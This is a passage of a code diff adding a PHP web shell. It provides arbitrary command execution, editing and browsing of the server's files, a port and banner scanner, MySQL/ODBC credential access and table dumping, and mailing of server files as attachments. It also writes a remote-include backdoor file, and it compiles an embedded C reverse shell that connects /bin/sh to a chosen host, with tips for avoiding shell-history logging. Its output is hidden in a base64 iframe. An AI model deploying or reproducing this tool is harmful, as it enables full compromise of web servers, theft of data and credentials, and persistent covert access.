+	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
+	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>"; 
+	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
+		$strOutput .= show_file($editfile);
+	$strOutput .= "</textarea></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
+		$strOutput .= edit_file($editcontent,$editfile,$edit);
+ 	$strOutput .= "</td></tr>
+	</table>
+	</form>";
+}
+###############################################################################
+# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
+###############################################################################
+if($cmdln == 1) {
+	$emeth = test_cmd_shell();
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
+	<tr><td colspan=2>";
+	if($emeth < 3) {
+		$strOutput .= "The output of this command will be somewhere on the page!";
+		Mexec($cmdcall, $emeth);
+	} else {
+		$strOutput .= Mexec($cmdcall, $emeth);
+	}
+	$strOutput .= "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# sending mime mail
+###############################################################################
+if($mail == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
+	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
+	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
+	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
+	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
+	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
+	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
+	</form>
+	</table>";
+}
+
+###############################################################################
+# drop mini inc handling
+###############################################################################
+if($dropinc == 1) { 
+	if($loc!="") $miniinc_loc = $loc;
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
+	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2><pre>";
+	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
+	$strOutput .= "</pre></td></tr>
+	</form>
+	</table>";
+} 
+###############################################################################
+# connect C back shell handling
+###############################################################################
+if($connectback == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
+	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
+	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
+	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
+	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
+	$strOutput .= "</td></tr></form></table>";
+}
+
+###############################################################################
+# PHP shell handling
+###############################################################################
+if($phpshell == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
+	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
+	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
+	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
+	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
+	$strOutput .= "</td></tr></form></table>";
+}
+
+
+###############################################################################
+# snooping
+###############################################################################
+if($snoop == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
+	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# show highlited source
+###############################################################################
+if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# service check
+###############################################################################
+if($servicecheck == 1) {
+if($servhost!="") $host = $servhost;
+else $host = "localhost";
+
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
+	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
+	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
+	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2><pre>";
+
+	$hosts = explode(" ", $host);
+	$port = explode(" ",$tcpports);
+	$values = count($port);
+	$numhosts = count($hosts);
+	if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
+	else if($values > 1) $strOutput .= "Checking $values ports..\n";
+	else $strOutput .= "No ports specified!!\n";
+	if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
+	else if($numhosts == 1) $strOutput .= "On 1 host..\n";
+	else $strOutput .= "No hosts specified!!\n";
+	if($numhosts >= 1) {
+		for($hcount=0; $hcount < $numhosts; $hcount++) {
+			$tmphost = $hosts[$hcount];
+			$strOutput .= "\nTesting $tmphost..\n";
+			if(($values == 1 && $port[0] != "") | $values > 1) {
+				for ($cont=0; $cont < $values; $cont++) {
+					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
+					$service = getservbyport($port[$cont],"tcp");
+					@$get = fgets($sock[$cont]);
+					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
+					flush();
+				}
+			}
+		}
+	}
+	$strOutput .= "</pre></td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# show phpinfo
+###############################################################################
+if($phpinfo == 1){ 
+	phpinfo();
+}
+######################################################################
+# db stuff
+######################################################################
+if($mysqlaccess == 1) {
+	$strOutput .= "<table border=1>
+	<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
+	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
+	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
+	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
+	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
+	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
+	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
+	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
+	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
+	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
+	</table>";
+}
+
+if($incdbhost!="" && $incdbuser!="") {
+	if($incdbvar!="") $dbh = $incdbhost;
+	else $dbH = $incdbhost;
+	$dbu = $incdbuser;
+	$dbp = $incdbpass;
+	if($incdbsql!="") $dbs = $incdbsql;
+	if($incdbname!="") $dbn = $incdbname;
+	if($incdbtable!="") $dbt = $incdbtable;
+	if($incdbfile!="") $dumpfile = $incdbfile;
+}
+
+if(isset($dbh)) {
+	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
+	eval("\$Gdbhost = \"\$$dbh\";");
+	eval("\$Gdbuser = \"\$$dbu\";");
+	eval("\$Gdbpass = \"\$$dbp\";");
+	eval("\$Gdbname = \"\$$dbn\";");
+	$strOutput .= "<tr><td>";
+	if($dbn=="") {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
+		"</td></tr><tr><td>" .
+		display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
+	} else if(isset($dbs)) {
+		$Gdbsql = $dbs;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql . 
+		"</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
+		} else {
+			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
+		}
+	} else if(isset($dbt)) {
+		$Gdbtabl = $dbt;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
+		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
+		$strOutput .= "</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		
+		} else {
+			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
+		}
+	} else {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
+		"</td></tr><tr><td>" .
+		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($dbH)) {
+	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
+	if($dbn=="") {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
+		"</td></tr><tr><td>".
+		display_dbs($dbH, $dbu, $dbp);
+	} else if(isset($dbs)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
+		"</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
+		} else {
+			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
+		}
+	} else if(isset($dbt)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
+		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
+		$strOutput .= "</td></tr><tr><td> ";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		
+		} else {
+			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
+		}
+	} else {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
+		"</td></tr><tr><td>" .
+		display_tables($dbH, $dbu, $dbp, $dbn);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($Odbh)) {
+	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
+	eval("\$Gdbhost = \"\$$Odbh\";");
+	eval("\$Gdbuser = \"\$$dbu\";");
+	eval("\$Gdbpass = \"\$$dbp\";");
+	eval("\$Gdbname = \"\$$dbn\";");
+	$strOutput .= "<tr><td>";
+	if(isset($dbt)) {
+		$Gdbtabl = $dbt;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
+		"</td></tr><tr><td>" .
+		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
+	} else {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
+		"</td></tr><tr><td> " .
+		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($OdbH)) {
+	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
+	if(isset($dbt)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
+		"</td></tr><tr><td> " .
+		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
+	} else {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
+		"</td></tr><tr><td> " .
+		Odisplay_tables($OdbH, $dbu, $dbp);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+
+$strOutput .= "</font></td></tr></table>";
+$strOutputB64 = chunk_split(base64_encode($strOutput));
+echo "</div></div></div></div></div></div></div></div></div></div>\n";
+echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';
+
+######################################################################
+#
+# functions
+#
+######################################################################
+# make globals avail
+function import_globals()  
+{
+	global $HTTP_SERVER_VARS;
+	global $REMOTE_ADDR;  
+	global $PHP_SELF;
+	global $REQUESTS;
+	global $SCRIPT_FILENAME;
+	global $QUERY_STRING;
+	global $SCRIPT_URI;
+	global $SERVER_NAME;
+	$_igr = ini_get('register_globals');
+	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
+	if (phpversion() <= '4.1.0') {
+		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS); 
+	} else {
+		$REQUESTS = $_REQUEST;
+	}
+	if($_SERVER['PHP_SELF']=="") {
+		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME'];
+		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI'];
+		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR'];
+		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING'];
+		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF'];
+		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
+	} else {
+		$SERVER_NAME     = $_SERVER['SERVER_NAME'];
+		$SCRIPT_URI      = $_SERVER['SCRIPT_URI'];
+		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR'];
+		$QUERY_STRING    = $_SERVER['QUERY_STRING'];
+		$PHP_SELF        = $_SERVER['PHP_SELF'];
+		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
+	}
+}
+
+function dd($v) {
+	global $DebugArr;
+	$rv = "<blockquote>\n";
+	$q="while(list(\$key,\$val) = each(\$$v)) {".
+	' if(array_search($key, $DebugArr)) {'.
+	' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
+	'  echo "<b>$key</b>>><br/>";'.
+	'  @dd($v."[".$key."]");'.
+	' } else if($key=="GLOBALS") {'.
+	' } else echo "<b>$key</b>=>$val<br/>";'.
+	'};';
+	eval($q);
+	echo "</blockquote>\n";
+}
+
+function ddb($v) {
+	echo "<blockquote>\n";
+	$q="while(list(\$key,\$val) = each(\$$v)) {".
+	' if((is_array($val)) && ($key!="GLOBALS")) {'.
+	'  echo "<b>$key</b>>><br/>";'.
+	'  @dd($v."[".$key."]");'.
+	' } else if($key=="GLOBALS") {'.
+	' } else echo "<b>$key</b>=>$val<br/>";'.
+	'};';
+	eval($q);
+	echo "</blockquote>\n";
+}
+
+######################################################################
+# cmd shell functions
+######################################################################
+# test what cmd is working
+function test_cmd_shell(){
+	if(strlen(Mexec("pwd", 5))>11)     $var = 5;
+	elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
+	elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
+	elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
+	elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
+	else $var = 0;
+	return $var;
+}
+# function for executing cmds
+function Mexec($Mcmd, $type) {
+	if($Mcmd != ""){
+		$dspec = array(
+			0 => array("pipe", "r"),
+			1 => array("pipe", "w"),
+			2 => array("pipe", "r")
+		);
+		$output = "";
+		switch($type) {
+			case 5:
+				$output .= "<pre>";
+				$lastline = exec($Mcmd, $arrOutput);
+				foreach($arrOutput as $val) {
+					$output .= $val . "\n";
+				}
+				$output .= "</pre>";
+				break;
+			case 4:
+				$proc = proc_open($Mcmd, $dspec, $pipes);
+				if (is_resource($proc)) {
+					$output .= "<pre>";
+					fclose($pipes[0]);
+					while(!feof($pipes[1])) {
+						$tmp = fgets($pipes[1], 1024);
+						$output .= $tmp;
+					}
+					$output .= "</pre>";
+				}
+				break;
+			case 3;
+				$output .= "<pre>";
+				$output .= `$Mcmd`;
+				$output .= "</pre>";
+				break;
+			case 2;
+				print "<pre>\n";
+				$output = system($Mcmd);
+				print "</pre>\n";
+				break;
+			case 1;
+				print "<pre>\n";
+				$output = passthru($Mcmd);
+				print "</pre>\n";
+				break;
+			case 0;
+			default;
+				$output = "There are no execute functions available!";
+				break;
+		}
+		return $output;
+	}	
+}
+function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
+	$msgerror = "";
+	if($msg == "") $msgerror = "please enter a message";
+	elseif($subject == "") $msgerror = "please enter a subject";
+	else {
+		$stlf = md5(uniqid(time())); 
+		$attach = "";
+		$fp = fopen($attach_source, "rb"); 
+		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); } 
+		$header = "From: $from\n"; 
+		$header .= "MIME-Version: 1.0\n"; 
+		$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n"; 
+		$header .= "This is a multi-part message in MIME format\n"; 
+		$header .= "--$stlf\n"; 
+		$header .= "Content-Type: text/plain\n"; 
+		$header .= "Content-Transfer-Encoding: 8bit\n\n"; 
+		$header .= "$msg\n"; 
+		$header .= "--$stlf\n"; 
+		$header .= "Content-Type: $content_type; name=$attach_appear\n"; 
+		$header .= "Content-Transfer-Encoding: base64\n"; 
+		$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n"; 
+		$header .= chunk_split(base64_encode($attach)); 
+		$header .= "\n"; 
+		$header .= "--$stlf--"; 
+		mail($to,$subject,"",$header); 
+		$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
+	} 
+	return $msgerror;
+}
+
+######################################################################
+# system browsing
+######################################################################
+
+function make_switch($val){
+	global $txt;
+	global $lang;
+	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
+	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
+	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
+	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
+}
+function drop_syslog_warning($msg) {
+	global $syslog;
+#	if($syslog == 1) syslog(LOG_WARNING,$msg);
+}
+
+######################################################################
+# file functions
+######################################################################
+function copy_file($source,$dest) {
+	$dataout = "";
+	if($source == "")  $dataout .= "enter source<br>\n";
+	if($dest != "") {
+		ini_set("user_agent","m0ins downloader");
+		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
+		if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
+	} else {
+		$dataout .= "enter destination";
+	}
+}
+function edit_file($cont,$dest,$do) {
+	$dataout = "";
+	global $magic_quotes_gpc;
+	if(file_exists($dest)) {
+		if($do == 1){
+			$fh = fopen($dest, "w");		
+			if(!$fh) {
+				$dataout .= "unable to open <b>$dest</b>.\n";
+			} else {
+#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont));
+				if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
+				$write = fwrite($fh, $cont);
+				fclose($fh);
+			}
+		}
+		$dataout .= highlight_file($dest, 1);
+	} else {
+		$dataout .= "unable to open <b>$dest</b>.\n";
+	}
+	return $dataout;
+}
+function show_file($source) {
+	$dataout = "";
+	if(file_exists($source)) {
+		$fh = fopen($source, "r");
+		if(!$fh) {
+			$dataout .= "unable to open <b>$source</b>.\n";
+		} else {
+			$read = fread($fh, filesize($source));
+			fclose($fh);
+			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read));
+			$dataout .= $read;
+		}
+	} else {
+		$dataout .= "unable to open <b>$source</b>.\n";
+	}
+	return $dataout;
+}
+function snoopy($chdir){
+	$tmpOut = "";
+	global $is_file,$is_dir,$is_w_dir,$is_w_file;
+	$fh = opendir("$chdir");
+	if($fh!="") {
+		while (false !== ($filename = readdir($fh)) ) {
+			$FN = $chdir."/".$filename;
+			if(@is_file($FN)) $is_file[] = $filename;
+			if(@is_dir($FN))  $is_dir[] = $filename;
+			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename;
+			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
+		}
+		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>";
+		$tmpOut .= echo_files($is_file,  "all files");
+		$tmpOut .= echo_files($is_dir,   "only dirs");
+		$tmpOut .= echo_files($is_w_dir, "writable dirs");
+		$tmpOut .= echo_files($is_w_file,"writable files");
+		$tmpOut .= "</tr></table>";
+	} else {
+		$tmpOut .= "Permission denied.";
+	}
+	closedir($fh);
+	return $tmpOut;
+}
+
+function echo_files($arr,$txt){
+	$tmpOutMF = "";
+	global $chdir,$MyLoc,$SREQ;
+	$tmpOutMF .= "<td valign=top>";
+	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
+	if(count($arr) > 0) {
+		foreach($arr as $key => $file) {
+			$FN = $chdir."/".$file;
+			$owner = fileowner($FN);
+			$perms = substr(sprintf("%o",fileperms($FN)),-3);
+			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
+			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
+			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>"; 
+			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
+		}
+	}
+    $tmpOutMF .=  "</td>";
+    return $tmpOutMF;
+}
+function print_globals($v) {
+	global $a;
+	echo "<blockquote>\n";
+	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
+	" echo \"<b>\$key</b>=>\$val.<br>\"; ".
+	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
+	" @print_globals( \$v.\"[\".\$key.\"]\" );".
+	"}}";
+	eval($q);
+	echo "</blockquote>\n";
+}
+######################################################################
+# connect back shell function
+######################################################################
+
+function connect_back($tmp_dir, $compiler, $host, $port) {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+    $fbname = $tmp_dir . "/cbs";
+	$fp = fopen($fbname . ".c", "w");
+	$write = fwrite($fp, $shell);
+	fclose($fp);
+	if(!empty($write)) {
+		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
+		$execM = test_cmd_shell();
+		if($execM > 0) {
+			$rtval = Mexec($command, $execM);
+			$command = $fbname . " " . $host . " " . $port;
+			$rtval .= Mexec($command, $execM);
+			return "<pre>" . $rtval . "</pre>";
+		} else {
+			return "<b>ERROR! No EXEC Avilable!</b>";
+		}
+		
+	} else {
+		return "<b>ERROR! Writing data!</b>";
+	}
+}
+
+######################################################################
+# drop mini inc hole
+######################################################################
+function dropminiinc($location) {
+	$Scode = "<?php\n".
+		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
+		"else \$vars = \$_REQUEST;\n".
+		"include(\$vars[inc]);\n".
+		"?>\n";
+	$fp = fopen($location, "w");
+	$write = fwrite($fp, $Scode);
+	if(!empty($write)) return "<b>$location</b> copied\n";
+	else return "<b>ERROR! Not copied!</b>";
+}
+
+######################################################################
+# db functions
+# unchanged from dans code
+######################################################################
+function prep_rows($myresult) {
+	$dataout = "<table>\n";
